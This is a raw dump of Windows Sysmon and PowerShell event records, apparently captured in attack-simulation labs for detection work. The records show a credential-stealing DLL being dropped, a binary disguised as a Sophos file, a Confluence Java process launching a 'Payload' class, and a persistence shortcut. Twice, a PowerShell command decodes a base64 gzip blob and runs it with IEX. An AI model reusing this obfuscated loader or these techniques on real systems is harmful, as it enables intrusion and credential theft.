11 2 4 11 0 0x8000000000000000 7536 Microsoft-Windows-Sysmon/Operational EC2AMAZ-34S98QL - 2023-10-25 18:33:16.436 D4BC5266-5F39-6539-1201-000000006C02 1172 C:\Users\user\fefffe8cea\explothe.exe C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll 2023-10-25 18:33:16.436 EC2AMAZ-34S98QL\user 11 2 4 11 0 0x8000000000000000 45619 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10.snapattack.labs - 2023-04-26 15:25:24.902 43199D79-4264-6449-EA11-000000001100 1988 c:\Users\snapattack\Desktop\auSophos.exe C:\Windows\System32\auSophos.exe 2023-04-26 15:25:24.902 NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 20639 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-06-13 17:59:04.009 BD1BA16A-AE67-6488-E70A-000000001100 10232 C:\Python311\python.exe C:\Users\patreides\wesng-master\definitions.zip 2023-06-13 17:49:52.475 SNAPATTACK\snapattack 1 5 4 1 0 0x8000000000000000 141187 Microsoft-Windows-Sysmon/Operational arrakis.snapattack.labs - 2023-10-23 16:39:52.143 D52145E4-A1D8-6536-1B14-000000002900 16536 C:\Program Files\Atlassian\Confluence\jre\bin\java.exe 17.0.6.0 OpenJDK Platform binary OpenJDK Platform 17.0.6 Eclipse Adoptium java.exe "C:\Program Files\Atlassian\Confluence\jre\bin\java.exe" -classpath C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\~spawn181647689087732547.tmp.dir lKSadNaahy.Payload C:\Program Files\Atlassian\Confluence\ NT AUTHORITY\NETWORK SERVICE D52145E4-D90E-651E-E403-000000000000 0x3e4 0 System MD5=2E13D01FC2695885F82CD14A1341D938,SHA256=89EC545936130365966A8757D270E79D5A9A33862EF5381182E8F4DD45C6DF6C,IMPHASH=A3B2BC4C37031B328CB93EF3CD677B6B D52145E4-A1D7-6536-1714-000000002900 7760 C:\Program Files\Atlassian\Confluence\jre\bin\java.exe "C:\Program Files\Atlassian\Confluence\jre\bin\java.exe" -classpath "C:\Program Files\Atlassian\Confluence\temp\~spawn12803749317320464047.tmp.dir" lKSadNaahy.Payload NT AUTHORITY\NETWORK SERVICE 4104 1 3 2 15 0x0 112218 Microsoft-Windows-PowerShell/Operational MSEDGEWIN10.snapattack.labs 1 1 $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 6ade9e82-6a36-4f55-8f89-cd64b11b4ae6 11 2 4 11 0 0x8000000000000000 1588985 Microsoft-Windows-Sysmon/Operational WIN10-21H1.snapattack.labs - 2024-08-07 18:54:37.828 F51F9151-C2E7-66B3-E30B-000000000C00 11692 C:\Users\localuser\Desktop\ipsscan-3.9.1-setup.exe C:\ProgramData\Microsoft\LogUpdateWindows\Microsoft.AnyKey.lnk 2024-08-07 18:54:37.828 WIN10-21H1\localuser 11 2 4 11 0 0x8000000000000000 238443 Microsoft-Windows-Sysmon/Operational MXS01.snapattack.local - 2022-05-04 18:22:17.952 157BFC03-C458-6272-751E-000000000B00 2216 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\whoami.txt 2022-05-04 18:22:17.951 NT AUTHORITY\SYSTEM 11 2 4 11 0 0x8000000000000000 20639 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-06-13 17:59:04.009 BD1BA16A-AE67-6488-E70A-000000001100 10232 C:\Python311\python.exe C:\Users\patreides\wesng-master\definitions.zip 2023-06-13 17:49:52.475 SNAPATTACK\snapattack 4104 1 3 2 15 0x0 112218 Microsoft-Windows-PowerShell/Operational MSEDGEWIN10.snapattack.labs 1 1 $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 6ade9e82-6a36-4f55-8f89-cd64b11b4ae6 11 2 4 11 0 0x8000000000000000 238443 Microsoft-Windows-Sysmon/Operational MXS01.snapattack.local - 2022-05-04 18:22:17.952 157BFC03-C458-6272-751E-000000000B00 2216 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\whoami.txt 2022-05-04 18:22:17.951 NT AUTHORITY\SYSTEM